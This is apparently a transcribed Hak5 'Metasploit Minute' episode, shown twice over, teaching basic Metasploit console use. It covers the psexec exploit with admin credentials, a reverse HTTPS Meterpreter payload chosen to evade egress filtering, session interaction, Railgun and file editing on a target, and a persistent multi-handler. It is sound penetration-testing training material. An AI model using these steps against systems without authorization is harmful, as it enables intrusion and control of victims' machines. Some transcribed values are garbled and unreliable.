Essential Metasploit Commands Overview

Basic commands this time on Metasploit Minute. This Metasploit Minute is brought to you by Hack5 and viewers like you. Support us directly at HAKshop.com Welcome to Metasploit Minute, the breakdown on breaking in. I'm your host Rob Fuller, but you can call me Lewis. Today we're going to be going over the basic commands from MSI. First and foremost, we are definitely going to have to show you how to get the cow. So here we go. All you have to do is type banner. That's it. And just keep going until you get that cow. Because that's the only way anything's ever going to work. Or you can exit. We have a session, so let's just get the banner. Might take a second. There we go. So now, once we have the banner, that... the cowsay banner, the one that we actually want to use, we have to then look at what other commands that we can use. So unlike what I said in the last segment, to get to show the commands in MSF console, you can do a question mark, a lot like a Cisco router. So if you go up, you can see there's a ton of commands, but the one you're going to use the most is use. So use, and then you start using the things that you have. So we're going to type banner one more time and you can see that there are exploits, auxiliary modules, post modules, payloads, encoders, and knobs. So the cool thing about this is this is based on a directory structure. So if you look at, we're going to be using the psexec module. So if you look in here you have the MSF or Metasploit directory, then in modules, exploits, windows, SMB, and then there's the psexec that we're going to be using. So use Windows or sorry exploits Windows SMB PS exec and that's it now we're in the PS exec module now I've gone ahead and set a few show options to show what's already set and what options are available now I've set a few options here already like the IP address of my target the password the username that I'm going to PS exec against and then the Payload. Now I really don't like reverse TCP because it's a straight TCP connection and will rarely get out of most organizations. So we're going to actually change the payload to something else. We're going to say set payload. Now you can use these options as lowercase options, but I would recommend sticking with the uppercase option just simply because there are other things that inside of Metasploit can go wrong if you don't use all uppercases. Set payload or use the the case sensitive version of whatever options you're using. Payload to Windows, Interpreter, Reverse, HTTPS. So we're going to switch that. Now you can see that our options are similar, Lhost and Lport. So we're just going to change the Lport to 443. Then, so we've set different things. Now what we need to do is exploit. Exploit has options. As I said, anything with dash, you can do dash H and you find different things with it. So I'm going to exploit dash J. Now what that does is sets it as a job and we'll see what a job means in a second. So while it's going, I can actually run other things while that's going. And hopefully in a second get a payload out of this. No, maybe not. That didn't work, but... Oh, there it is. Ha! Just had to wait a second. So, now that we have a session, we can do sessions and see our different sessions. So, in auxiliary modules, what you want to do is use run. So, you have exploit in exploit modules, and all the auxiliary modules you want to do run. And then in payload modules, you actually have another command you can say generate. So, now let's take a look at another command. One of the things that you'll get... intimately familiar with once you start, once we start actually making payloads is IRB and edit. So IRB, if you've used Ruby before, is the interpreter for Ruby. And the great thing about IRB inside of Metasploit is it's in the context of wherever you are. So if you're in a session, so we're going to do sessions-i, and let's do a help real quick to show you what those are. If you do sessions-i, which says interact with it, and we say 1, we want to interact with session one which is right here we can do IRB And that puts us in the context of our meterpreter session. So now we can basically run any Ruby code that we want, a loop, an if statement, anything that we want, straight in in Ruby on the host it is. Now it's not executing the Ruby on the host, but it's executing in the context of meterpreter. So if you want to upload a file or download a file or do a bunch of other things, and we'll be talking about that when we actually make modules, you can do that straight from here. So let's do... A quick one, client.railgun, and we'll be talking about what railgun is,.user32, that's the DLL that we're going to be talking to. I think it's lock workstation. If we were on that system, what we actually did right there is lock that workstation. So it went to its login screen. So that's cool stuff that we can do with Railgun, and we'll talk about that later. But what if we wanted to edit a file? So let's do an ls real quick. Oh, that's in system32, which is not a good idea. So let's go to c colon directory. See there's dial.bat. Let's edit dial.bat. What that'll do is get us straight into a editor of our choice. And as soon as we exit out of it, it will first download it so that we can edit it, and then re-upload it, whatever options that we have. So, cool way to edit a file directly on the target host. If we go back, if we go back around into this, if we type edit here, we're actually editing the module inside of Metasploit. So, if we make changes, it will automatically get reloaded. So, if say we wanted to change, just for instance, we wanted to say, This isn't Microsoft. Oops, I can't... how do you... Yeah, yeah, yeah. There we go. This is Bob. And then... stupid Vi. Right, quit. So, now it's changed. So if we do info on it... I have to reload. So reload. And then info. If we scroll up, we now have Bob's Windows Authenticated Code Execution. Cool stuff. So when we start making more modules and writing things, we'll be using this a lot so that we don't have to jump out of our stuff before. Another fun one is Load. Now, Load actually loads plugins for Metasploit. And there's a bunch of different plugins. If you just tab complete it, you can see some of them. If you're in the directory structure, you can do... plugins and list them there. There's a lot of cool plugins. One of our favorites, one of my favorites, is the sound plugin written by, oh, this guy named DigiNinja. You might know him as Robin Wood. Let's see if he'll make a sound. Okay, so it's not making a sound for some reason, but if you had your VM directly connected to your output and it wasn't muted. It would actually make sounds. It actually makes sounds even every time you make a connection to a session. So next up, that's load. And in the context of Meterpreter, sessions-i, 1, load, incognito, it actually loads extensions onto Meterpreter. So different context means different things. And it's kind of a little bit confusing, but there's only really two contexts, inside of a module or inside of a Meterpreter session. The next one that's fun is save. Now save, say I want to do a lot of demos and I want to make it so that I can get back into that demo really quickly. Well save, saves your configuration, the current settings, your variables on a global scale, your variables at a module scale into a file, the slash config. Now real quick, let's look at what's in that file now. You'll see that the configuration things that are in here are the module I was in, the different options that were set, and some of these you didn't see just because they're advanced options. And that's pretty much it, and it shows you what active module I am in. So if I exit out of this and say, yes, I don't care that I had sessions, and I go back into MSF console, what we should be is... in that module with all of those settings. All right, so we're back in, show options, and for some reason, none of those settings are there. Awesome. That's weird. Oh, it didn't even save the SMB client. Okay, so that's a bug, and we'll submit that as a bug later. So what if that happens, though? What if there are things that don't save correctly? So let's set SMB user, and this is the next command we're going to talk about. So let's save, or let's show you a different thing. So let's set smb user to administrator, set smb pass to that. So options, show options, see if everything's set correctly. Exploit. Logon type not granted. Weird. Okay. Nope. But it created a session for some reason. Whatever. It worked. Alright, if we type save, it's going to do that same thing. If we look back into here, oh, it did save the SMB user and pass this time. But let's say it didn't. We can do a make RC and when we talk about resource files in another segment, but what this does is takes all of the commands that you've typed since you started every single step of the way using bunch of different modules, bunch of different steps. and creates a resource script. And you can load these resource scripts in a bunch of cool ways. So we're going to say make rc exploit example.rc. Added all of those nine commands, we go into our Metasploit directory because that's where we are. Exploit example, and there it is. Those are all the commands that we typed from start to finish. And what we want to definitely do is remove, make, or save and make RC. Alright, so those are some of the commands and we've exploited our first box, we've created sessions. How about searching for other modules? Now, what we could do is simply go in the modules directory and find, or grep, or anything else we wanted to do. It's quick, easy command line. Anyone who knows Unix can do that kind of stuff. There's also a search inside of Metasploit that you can search for things. So if we wanted to search ps-exec and find it all of the ps-exec modules, now we can see that there is a bunch of different modules that do ps-exec and they're in different directories. So there's an auxiliary module that does ps-exec, an exploit module, the local exploit that does ps-exec. So that might help us find things a little easier than what we might have done with the modules directory. So sessions. We've already kind of gone over, but there's a bunch of things you can do with sessions, including terminating sessions, detaching interactive sessions, listening sessions, quiet mode, all of these other cool fun things. And then finally, jobs. Now, there aren't any jobs right now because we haven't set up anything to run in the background. We did with our PS exec real quick a second ago so that we could show it. But let's say as an attacker, What I don't like doing is setting up a handler every single time I do an exploit. What I want to have is a handler just listening and taking in all of those exploits, all of those connections back by themselves. So what I will do is use exploit multi handler. So this multi handler will take all those payload connections in. We set our payload in here, Windows, interpreter, reverse HTTPS. It's going to take a second to load it. Set our options. So lhost, what is my IP address? So 128. So 2.168.16.102.128. Set lport to 443. Set exit on session. So this is the important part. Set exitOnSession to false. That way we're actually not going to close the handler after it's done. And then exploit-j makes it a job. Now anytime we get a session in, it's going to go to this handler. That way we can get a ton of sessions in really quickly and never have to deal with it. So jobs-v and there it is. We'll be going into a lot more of each one of these commands. And I want you to just have something to play with initially. So let me know what you think hit me up at MSF at hack 5 org Stay tuned to Metasploitminute.com for more shows like these Thank you again for supporting the show if you have if you want to support us even more you can go to hack Shop.com HAK shop.com and enter the code Mubix to get some free Metasploitminute stickers until next time I'm Mubix and I'll be hacking till the cows come home

First and foremost, we are definitely going to have to show you how to get the cow. So here we go. All you have to do is type banner.

That's it. And just keep going until you get that cow. Because that's the only way anything's ever going to work. Or you can exit. We have a session, so let's just get the banner.

Might take a second. There we go. So now, once we have the banner, that...

the cowsay banner, the one that we actually want to use, we have to then look at what other commands that we can use. So unlike what I said in the last segment, to get to show the commands in MSF console, you can do a question mark, a lot like a Cisco router. So if you go up, you can see there's a ton of commands, but the one you're going to use the most is use. So use, and then you start using the things that you have.

So we're going to type banner one more time and you can see that there are exploits, auxiliary modules, post modules, payloads, encoders, and knobs. So the cool thing about this is this is based on a directory structure. So if you look at, we're going to be using the psexec module.

So if you look in here you have the MSF or Metasploit directory, then in modules, exploits, windows, SMB, and then there's the psexec that we're going to be using. So use Windows or sorry exploits Windows SMB PS exec and that's it now we're in the PS exec module now I've gone ahead and set a few show options to show what's already set and what options are available now I've set a few options here already like the IP address of my target the password the username that I'm going to PS exec against and then the Payload. Now I really don't like reverse TCP because it's a straight TCP connection and will rarely get out of most organizations. So we're going to actually change the payload to something else.

We're going to say set payload. Now you can use these options as lowercase options, but I would recommend sticking with the uppercase option just simply because there are other things that inside of Metasploit can go wrong if you don't use all uppercases. Set payload or use the the case sensitive version of whatever options you're using. Payload to Windows, Interpreter, Reverse, HTTPS. So we're going to switch that.

Now you can see that our options are similar, Lhost and Lport. So we're just going to change the Lport to 443. Then, so we've set different things. Now what we need to do is exploit. Exploit has options.

As I said, anything with dash, you can do dash H and you find different things with it. So I'm going to exploit dash J. Now what that does is sets it as a job and we'll see what a job means in a second. So while it's going, I can actually run other things while that's going. And hopefully in a second get a payload out of this.

No, maybe not. That didn't work, but... Oh, there it is. Ha! Just had to wait a second.

So, now that we have a session, we can do sessions and see our different sessions. So, in auxiliary modules, what you want to do is use run. So, you have exploit in exploit modules, and all the auxiliary modules you want to do run.

And then in payload modules, you actually have another command you can say generate. So, now let's take a look at another command. One of the things that you'll get...

intimately familiar with once you start, once we start actually making payloads is IRB and edit. So IRB, if you've used Ruby before, is the interpreter for Ruby. And the great thing about IRB inside of Metasploit is it's in the context of wherever you are.

So if you're in a session, so we're going to do sessions-i, and let's do a help real quick to show you what those are. If you do sessions-i, which says interact with it, and we say 1, we want to interact with session one which is right here we can do IRB And that puts us in the context of our meterpreter session. So now we can basically run any Ruby code that we want, a loop, an if statement, anything that we want, straight in in Ruby on the host it is. Now it's not executing the Ruby on the host, but it's executing in the context of meterpreter.

So if you want to upload a file or download a file or do a bunch of other things, and we'll be talking about that when we actually make modules, you can do that straight from here. So let's do... A quick one, client.railgun, and we'll be talking about what railgun is,.user32, that's the DLL that we're going to be talking to.

I think it's lock workstation. If we were on that system, what we actually did right there is lock that workstation. So it went to its login screen.

So that's cool stuff that we can do with Railgun, and we'll talk about that later. But what if we wanted to edit a file? So let's do an ls real quick.

Oh, that's in system32, which is not a good idea. So let's go to c colon directory. See there's dial.bat. Let's edit dial.bat. What that'll do is get us straight into a editor of our choice.

And as soon as we exit out of it, it will first download it so that we can edit it, and then re-upload it, whatever options that we have. So, cool way to edit a file directly on the target host. If we go back, if we go back around into this, if we type edit here, we're actually editing the module inside of Metasploit. So, if we make changes, it will automatically get reloaded. So, if say we wanted to change, just for instance, we wanted to say, This isn't Microsoft.

Oops, I can't... how do you... Yeah, yeah, yeah.

There we go. This is Bob. And then... stupid Vi. Right, quit.

So, now it's changed. So if we do info on it... I have to reload. So reload. And then info.

If we scroll up, we now have Bob's Windows Authenticated Code Execution. Cool stuff. So when we start making more modules and writing things, we'll be using this a lot so that we don't have to jump out of our stuff before.

Another fun one is Load. Now, Load actually loads plugins for Metasploit. And there's a bunch of different plugins. If you just tab complete it, you can see some of them. If you're in the directory structure, you can do...

plugins and list them there. There's a lot of cool plugins. One of our favorites, one of my favorites, is the sound plugin written by, oh, this guy named DigiNinja. You might know him as Robin Wood. Let's see if he'll make a sound.

Okay, so it's not making a sound for some reason, but if you had your VM directly connected to your output and it wasn't muted. It would actually make sounds. It actually makes sounds even every time you make a connection to a session.

So next up, that's load. And in the context of Meterpreter, sessions-i, 1, load, incognito, it actually loads extensions onto Meterpreter. So different context means different things. And it's kind of a little bit confusing, but there's only really two contexts, inside of a module or inside of a Meterpreter session. The next one that's fun is save.

Now save, say I want to do a lot of demos and I want to make it so that I can get back into that demo really quickly. Well save, saves your configuration, the current settings, your variables on a global scale, your variables at a module scale into a file, the slash config. Now real quick, let's look at what's in that file now. You'll see that the configuration things that are in here are the module I was in, the different options that were set, and some of these you didn't see just because they're advanced options.

And that's pretty much it, and it shows you what active module I am in. So if I exit out of this and say, yes, I don't care that I had sessions, and I go back into MSF console, what we should be is... in that module with all of those settings.

All right, so we're back in, show options, and for some reason, none of those settings are there. Awesome. That's weird.

Oh, it didn't even save the SMB client. Okay, so that's a bug, and we'll submit that as a bug later. So what if that happens, though?

What if there are things that don't save correctly? So let's set SMB user, and this is the next command we're going to talk about. So let's save, or let's show you a different thing. So let's set smb user to administrator, set smb pass to that. So options, show options, see if everything's set correctly.

Exploit. Logon type not granted. Weird. Okay.

Nope. But it created a session for some reason. Whatever. It worked. Alright, if we type save, it's going to do that same thing.

If we look back into here, oh, it did save the SMB user and pass this time. But let's say it didn't. We can do a make RC and when we talk about resource files in another segment, but what this does is takes all of the commands that you've typed since you started every single step of the way using bunch of different modules, bunch of different steps. and creates a resource script. And you can load these resource scripts in a bunch of cool ways.

So we're going to say make rc exploit example.rc. Added all of those nine commands, we go into our Metasploit directory because that's where we are. Exploit example, and there it is.

Those are all the commands that we typed from start to finish. And what we want to definitely do is remove, make, or save and make RC. Alright, so those are some of the commands and we've exploited our first box, we've created sessions.

How about searching for other modules? Now, what we could do is simply go in the modules directory and find, or grep, or anything else we wanted to do. It's quick, easy command line.

Anyone who knows Unix can do that kind of stuff. There's also a search inside of Metasploit that you can search for things. So if we wanted to search ps-exec and find it all of the ps-exec modules, now we can see that there is a bunch of different modules that do ps-exec and they're in different directories. So there's an auxiliary module that does ps-exec, an exploit module, the local exploit that does ps-exec.

So that might help us find things a little easier than what we might have done with the modules directory. So sessions. We've already kind of gone over, but there's a bunch of things you can do with sessions, including terminating sessions, detaching interactive sessions, listening sessions, quiet mode, all of these other cool fun things.

And then finally, jobs. Now, there aren't any jobs right now because we haven't set up anything to run in the background. We did with our PS exec real quick a second ago so that we could show it.

But let's say as an attacker, What I don't like doing is setting up a handler every single time I do an exploit. What I want to have is a handler just listening and taking in all of those exploits, all of those connections back by themselves. So what I will do is use exploit multi handler. So this multi handler will take all those payload connections in. We set our payload in here, Windows, interpreter, reverse HTTPS.

It's going to take a second to load it. Set our options. So lhost, what is my IP address?

So 128. So 2.168.16.102.128. Set lport to 443. Set exit on session. So this is the important part.

Set exitOnSession to false. That way we're actually not going to close the handler after it's done. And then exploit-j makes it a job.

Now anytime we get a session in, it's going to go to this handler. That way we can get a ton of sessions in really quickly and never have to deal with it. So jobs-v and there it is.

We'll be going into a lot more of each one of these commands. And I want you to just have something to play with initially. So let me know what you think hit me up at MSF at hack 5 org Stay tuned to Metasploitminute.com for more shows like these Thank you again for supporting the show if you have if you want to support us even more you can go to hack Shop.com HAK shop.com and enter the code Mubix to get some free Metasploitminute stickers until next time I'm Mubix and I'll be hacking till the cows come home

Transcript for:Essential Metasploit Commands Overview

Transcript for:
Essential Metasploit Commands Overview